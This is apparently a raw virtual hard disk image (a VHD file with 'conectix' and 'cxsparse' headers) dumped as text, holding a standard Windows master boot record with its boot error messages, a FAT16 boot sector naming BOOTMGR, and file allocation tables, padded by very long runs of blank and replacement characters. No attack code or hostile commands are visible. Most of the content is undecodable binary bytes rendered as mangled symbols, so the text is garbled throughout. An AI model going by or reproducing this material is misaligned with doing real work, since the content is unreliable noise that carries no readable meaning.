conectix             +#6+win  
  Wi2k              �   ���
�?֍���F�˱ �                                                                                                                                                                                                                                                                                                                                                                                                                                            cxsparse��������             @    ���7                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������3��м |���ؾ |� � ��Ph��� ���~  |�������V U�F�F �A��U�]r��U�u	�� t�Ff`�~ t&fh    f�vh  h |h h �B�V ���������� |�V �v�N�n�fas�Nu�~ ��� ���U2�V �]랁>�}U�un�v � u����d� ���`�| ���d�u �� ��f#�u;f��TCPAu2��r,fh�  fh   fh   fSfSfUfh    fh |  fah  �Z2�� |  ���������2� ��< t	� �������+��d� $��$�Invalid partition table Error loading operating system Missing operating system   c{����    �?�   ��                                                 U�                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                �<�MSDOS5.0     �� ? � �   �� � )��lNO NAME    FAT16   3ɎѼ�{�ٸ  ���� |8N$}$����<r��:f�|&f;&�W�u���V��s�3ɊF��fFVFыv`�F��V��  ��^�H��F�N�a�  �� r9&8-t`���}�at2Nt	�� ;�r��ܠ�}�}��@tHt�� ����}���}����&�UR��  �; r�[�V$�|���F�=}�F�)}�ىN�N���}��   ��f�F�fFf��f���^��JJ�F2���F�V��JRPSjj��F��3������B���v�����
̸�~u�B��V$�aar@uB^Iu��A�  `fj �BOOTMGR    
Remove disks or other media.�
Disk error�
Press any key to restart
       ���U�                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                ������������  	 
                        ! " # $ % & ' ( ) * + , - . / 0 1 2 3 4 5 6 7 8 9 : ; < = > ? @ A B C D E F G H I J K L M N O P Q R S T U V W X Y Z [ \ ] ^ _ ` ��b c d e f g h i j k l m n o p q r s t u v w x y z { | } ~  � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � ��� � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � �  	
 !"#$��&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������� 	
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~���������������������������������                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      ������������  	 
                        ! " # $ % & ' ( ) * + , - . / 0 1 2 3 4 5 6 7 8 9 : ; < = > ? @ A B C D E F G H I J K L M N O P Q R S T U V W X Y Z [ \ ] ^ _ ` ��b c d e f g h i j k l m n o p q r s t u v w x y z { | } ~  � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � ��� � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � �  	
 !"#$��&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������� 	
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~���������������������������������                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            